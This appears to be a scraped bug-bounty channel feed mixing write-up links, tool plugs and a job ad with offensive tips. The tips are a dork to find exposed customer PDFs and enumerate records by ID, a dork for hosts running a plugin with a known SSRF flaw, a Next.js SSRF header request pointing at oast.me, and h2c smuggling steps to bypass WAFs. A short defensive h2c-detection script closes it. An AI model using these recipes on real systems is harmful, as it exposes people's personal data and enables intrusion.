FROM INTERNET
1) A Simple Supply Chain Bug — Worth $11,850 — How GitLab Reinforces Trust in Open Source
https://medium.com/@justas_b1/a-simple-supply-chain-bug-worth-11-850-how-gitlab-reinforces-trust-in-open-source-424585c79074
2) First IDOR Via Response Manipulation worth $750
https://infosecwriteups.com/this-is-how-i-got-750-from-my-first-idor-8058061c65ba
3) Accessing Employee GitHub SSH Key
https://ghostman01.medium.com/accessing-employee-github-ssh-key-4e125faba413
4) Shared Invitation Hash Leads To Account Takeover
https://one33se7en.medium.com/shared-invitation-hash-leads-to-account-takeover-5fd0ecb3994e
5) How I Was Able to Take Over Accounts Without Email or Password
https://medium.com/@zyad_ibrahim333/how-i-was-able-to-take-over-accounts-without-email-or-password-5d7434d7a049
6) The One-Man APT, Part I: A Picture That Can Execute Code on the Target
https://hackers-arise.com/the-one-man-apt-part-i-a-picture-that-can-execute-code-on-the-target/
7) Blind SSRF Found on a Public Bug Bounty Target
https://medium.com/@Abood_XHacker/blind-ssrf-found-on-a-public-bug-bounty-target-f9ae1fcc9494
8) Katana to Kill‑Switch: Mastering ProjectDiscovery’s Crawler From Zero to Pro (with Real‑World Scenarios)
https://adce626.medium.com/katana-to-kill-switch-mastering-projectdiscoverys-crawler-from-zero-to-pro-with-real-world-62a7dec5a744
9) 7 Realistic VAPT & Bug Bounty Triage Interview Questions (With Answers) Part 2
https://medium.com/@cybersenpai/7-realistic-vapt-bug-bounty-triage-interview-questions-with-answers-part-2-9238b55f7af9
10) The Free URL Scanner That Saves Me Hours (CyScan.io)
https://kd-200.medium.com/the-free-url-scanner-that-saves-me-hours-cyscan-io-8909c26188e3
❤17
🔥 Find All Parameters - Tool to crawl pages, find potential parameters and generate a custom target parameter wordlist
✅ https://github.com/ImAyrix/fallparams
🔥17👍12❤1
Hey Hunters,
DarkShadow here back again, just dropping a list of queries.
30K+ Search Queries 🚀
(Google | Shodan | FOFA)
For hunters, red teamers & OSINT warriors:
⚡ Hunt faster
⚡ Spot misconfigurations instantly
⚡ Scan the global surface with precision
GitHub → https://github.com/projectdiscovery/awesome-search-queries
Show your love, guys ❤️
#bugbountytips #osint
🔥11❤7👍5😱4
Brut Security
⚡BrutDroid 2.0 is a powerful, Windows-optimized toolkit designed specifically for Android Studio, streamlining the setup of a mobile penetration testing lab. Built to make Android pentesting effortless, it automates emulator creation, rooting, Frida server…
Linux support will be added soon!
❤9🔥5👍4
We’re looking for a talented Full Stack Developer with strong MERN stack skills and hands-on experience in cloud deployment, CI/CD, DevOps, and DevSecOps.
What you’ll do:
1. Build and maintain frontend & backend applications
2. Deploy to cloud (AWS/Azure/GCP)
3. Set up and manage CI/CD pipelines
4. Implement DevOps & DevSecOps best practices
What we’re looking for:
1. MERN stack expertise (MongoDB, Express, React, Node)
2. Cloud deployment experience
3. CI/CD, Docker/Kubernetes knowledge
4. Familiarity with DevOps & DevSecOps principles
Experience required:
1. Minimum 1-2 years in IT infrastructure management, development and implementation.
2. Expertise in Git & GitHub Actions
✅Send Resume info@ncybersecurity.com
📍Remote, Preferably Kolkata, India 🇮🇳
❤6
⚡Autoswagger is a command-line tool designed to discover, parse, and test for unauthenticated endpoints using Swagger/OpenAPI documentation. It helps identify potential security issues in unprotected endpoints of APIs, such as PII leaks and common secret exposures.
✅https://github.com/intruder-io/autoswagger/
❤14👍9
A fresh Web Pentesting batch with a Bug Bounty approach is starting this week.
📱 If you're interested, DM on WhatsApp: wa.link/brutsecurity
🔥1
✅ For Faster Info Gathering
nuclei -list targets.txt -ai "Extract page noscript, detect tech and versions"
nuclei -list targets.txt -ai "Extract email addresses from web pages"
nuclei -list targets.txt -ai "Extract all subdomains referenced in web pages"
nuclei -list targets.txt -ai "Extract all external resource URLs (CDNs, images, iframes, fonts) from HTML"
nuclei -list targets.txt -ai "Extract social media profile links from web pages"
nuclei -list targets.txt -ai "Extract links pointing to staging, dev, or beta environments from HTML"
nuclei -list targets.txt -ai "Extract all links pointing to PDF, DOCX, XLSX, and other downloadable documents"
👍10❤8
Hey Hunters,
DarkShadow here back again, just dropping an awesome dork that makes pure bounty!
Unauthenticated Access to Sensitive Customer Data via Google Dorking
✅Steps to reproduce:
- Dork:
site:*.target.com* "date of birth" ext:pdf
- Check if the PDF file exposes customer data.
- Note the ID in the URL.
- Check whether, by changing the ID, you are able to access other data.
Result: IDOR + sensitive info leak (such as customer data)
Now guys, let me know: do you want to know all the dorks that make pure bounty?
If you guys want it, then show your love; I'll probably make a tool for automation or post the method.
Follow for More x.com/darkshadow2bd
#bugbountytips #dork #idor
🔥11❤10👍6🫡3
CVE-2025-8085: SSRF in Ditty WordPress plugin, 8.6 rating❗️
The vulnerability allows attackers without authentication to make requests to arbitrary URLs.
Search at Netlas.io:
👉 Link: https://nt.ls/HthP0
👉 Dork: http.body:"plugins/ditty-news-ticker"
Read more: https://wpscan.com/vulnerability/f42c37bb-1ae0-49ab-bd81-7864dff0fcff/
👍8🤝1
Hey Hunters,
DarkShadow here back again, dropping a critical SSRF 💥
Nextjs SSRF in Middleware header!
✅POC:
GET / HTTP/1.1
Host: target.com
Location: http://oast.me
X-Middleware-Rewrite: http://oast.me
If you guys really enjoy reading this, then show your love and follow me: x.com/darkshadow2bd
#ssrf #bugbountytips
👏18❤14🔥4🗿1
Hey Hunters,
DarkShadow here back again!
Check your Burp: is this feature enabled?
Most hackers miss this. So this is a great opportunity to make bounty using this Burp feature.
#bugbountytips #burp
1❤8👏7👍4🔥2
🪲 Bug Bounty Pro Tip: #H2C Upgrade Bypass
Target: Applications using HTTP/2 Cleartext (h2c) upgrades.
The Core Idea: Many Web Application Firewalls (WAFs) and reverse proxies process HTTP/1.1 but fail to correctly inspect traffic after it's upgraded to HTTP/2.
How to Test:
1. Find a target that accepts an Upgrade: h2c header (common in Java, gRPC, and some reverse proxies like Nginx).
2. Send an initial HTTP/1.1 request with the upgrade header:
GET / HTTP/1.1
Host: example.com
Upgrade: h2c
Connection: Upgrade
3. If the server agrees (responds with HTTP/1.1 101 Switching Protocols), the connection is now HTTP/2.
4. The Bypass: Craft and send malformed or smuggled HTTP/2 frames (e.g., with the :method header set to GET or POST). The downstream WAF may not parse this, allowing you to access internal endpoints or bypass security controls.
Why it works: The security boundary often only exists at the HTTP/1.1 layer. Once upgraded, your HTTP/2 traffic might be forwarded directly to the backend without inspection.
#BugBounty #Hacking #WebSecurity #WAFBypass #HTTP2
1🔥29❤14👍5
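As an added defender-side example (not code from the original post or from any WAF vendor), the check a reverse proxy or WAF can apply to the request shown above: parse the raw HTTP/1.1 request, recognise an `Upgrade: h2c` attempt, and strip the negotiation headers before forwarding so the connection stays HTTP/1.1 where it can still be inspected. The `HTTP2-Settings` value in the sample request is a constructed placeholder.

```python
"""Edge-side check for cleartext HTTP/2 (h2c) upgrade attempts.

A proxy that inspects only HTTP/1.1 must not let the backend accept an
h2c upgrade, or the rest of the connection bypasses inspection. This
detects the upgrade and removes the negotiation headers from what is
forwarded; non-h2c requests (WebSocket, keep-alive) are left untouched.
"""

# Hop-by-hop headers that carry the h2c negotiation (RFC 7230 / RFC 7540).
UPGRADE_HEADERS = {"upgrade", "connection", "http2-settings"}


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, version, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return method, target, version, headers


def tokens(value: str):
    """Comma-separated header list -> lowercase token set (e.g. 'h2c, websocket')."""
    return {t.strip().lower() for t in value.split(",") if t.strip()}


def is_h2c_upgrade(headers):
    """True if the request asks to switch the connection to cleartext HTTP/2."""
    upgrade, connection = set(), set()
    for name, value in headers:
        if name == "upgrade":
            upgrade |= tokens(value)
        elif name == "connection":
            connection |= tokens(value)
    return "h2c" in upgrade and "upgrade" in connection


def sanitize_for_backend(raw: str):
    """Return (upgrade_attempted, forwarded_headers).

    When an h2c upgrade is attempted the negotiation headers are dropped so
    the backend answers over plain HTTP/1.1; the flag lets the edge log or
    alert on the attempt. Other requests are forwarded unchanged.
    """
    _, _, _, headers = parse_request(raw)
    attempted = is_h2c_upgrade(headers)
    forwarded = [(n, v) for n, v in headers if n not in UPGRADE_HEADERS] if attempted else list(headers)
    return attempted, forwarded


# Constructed sample: the request from the post plus a placeholder HTTP2-Settings header.
SAMPLE_H2C = (
    "GET / HTTP/1.1\r\nHost: example.com\r\nUpgrade: h2c\r\n"
    "Connection: Upgrade\r\nHTTP2-Settings: AAMAAABkAAQAAP__\r\n\r\n"
)
```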